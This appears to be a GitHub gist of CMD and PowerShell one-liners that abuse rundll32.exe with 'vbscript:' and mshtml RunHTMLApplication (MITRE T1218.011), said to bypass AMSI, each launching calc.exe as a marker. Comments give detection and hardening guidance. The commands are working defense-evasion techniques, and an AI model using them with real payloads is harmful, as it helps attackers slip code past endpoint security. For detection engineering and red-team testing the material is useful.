@bobby-tablez
Created February 25, 2024 00:37
Proxy Execution Using Rundll32.exe Vbscript
# A list of CMD/PowerShell one-liners that use the T1218.011 (System Binary Proxy Execution: Rundll32) technique. As of 02/2024 these bypass AMSI.
# CMD
# Each entry runs rundll32 with a "vbscript:" argument that names
# mshtml,RunHTMLApplication and then evaluates a VBScript expression. Here the
# expression starts calc.exe through WScript.Shell as a harmless marker.
# The five entries differ only in the path-like text in front of
# ",RunHTMLApplication" (separator style, number of ".." segments, the filler
# segment "fishsticks"); the rest of the command line is identical.
# Detection: a rule keyed on one exact path string matches only that entry.
# Match on what stays constant instead: process-creation events (e.g. Sysmon
# Event ID 1, or Security Event 4688 with command-line auditing enabled) where
# the image is rundll32.exe and the command line contains "vbscript:" or
# "RunHTMLApplication", compared case-insensitively.
# A second signal is rundll32.exe appearing as the parent of a new process
# (calc.exe in these samples) - presumably the case here; confirm in a lab.
# Hardening: where the environment allows it, restrict rundll32.exe through
# application-control policy (e.g. WDAC or AppLocker).
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\..../\/\fishsticks\\..\\../\/\mshtml/\/\..\\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
# PowerShell
# Every entry below ends in the same rundll32 "vbscript:" ...
# ",RunHTMLApplication" command line; only the way it is launched changes.
# For detection this means the parent process of rundll32.exe is not a stable
# field, so key rules on the rundll32.exe command line itself. PowerShell
# script block logging (Event ID 4104), where enabled, records the wrapper text.

# Launched through Start-Process -> cmd.exe /c.
Start-Process cmd.exe -ArgumentList '/c', 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'
# Same cmd.exe /c line, passed as a string to Invoke-Expression.
Invoke-Expression -Command "cmd.exe /c rundll32 vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `"+String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)"
# Start-Job runs the script block as a background job, which then starts
# rundll32.exe directly (no cmd.exe in between).
Start-Job -ScriptBlock { Start-Process "rundll32.exe" -ArgumentList 'vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' }
# The execution-policy change is scoped to the current process. Execution policy
# governs loading of script files, so it is presumably not what permits the
# cmd /c call that follows - treat it as an extra indicator, not a requirement.
Set-ExecutionPolicy Bypass -Scope Process; & cmd /c 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'
# Invoke-Command with -ComputerName set to the local machine name.
# NOTE(review): this presumably goes through PowerShell remoting on the local
# host, which changes the process ancestry seen in telemetry - confirm.
$scriptBlock = {cmd.exe /c rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)};Invoke-Command -ScriptBlock $scriptBlock -ComputerName $env:computername
# Process creation through WMI (Win32_Process.Create); the new process is
# typically parented by the WMI provider host rather than by PowerShell.
# NOTE(review): the argument text here differs from the other entries (the two
# parts are joined with "," and the String(...) part is quoted), so detection
# patterns should not depend on the literal "+String(" sequence.
Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "rundll32.exe vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `",`"String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)`""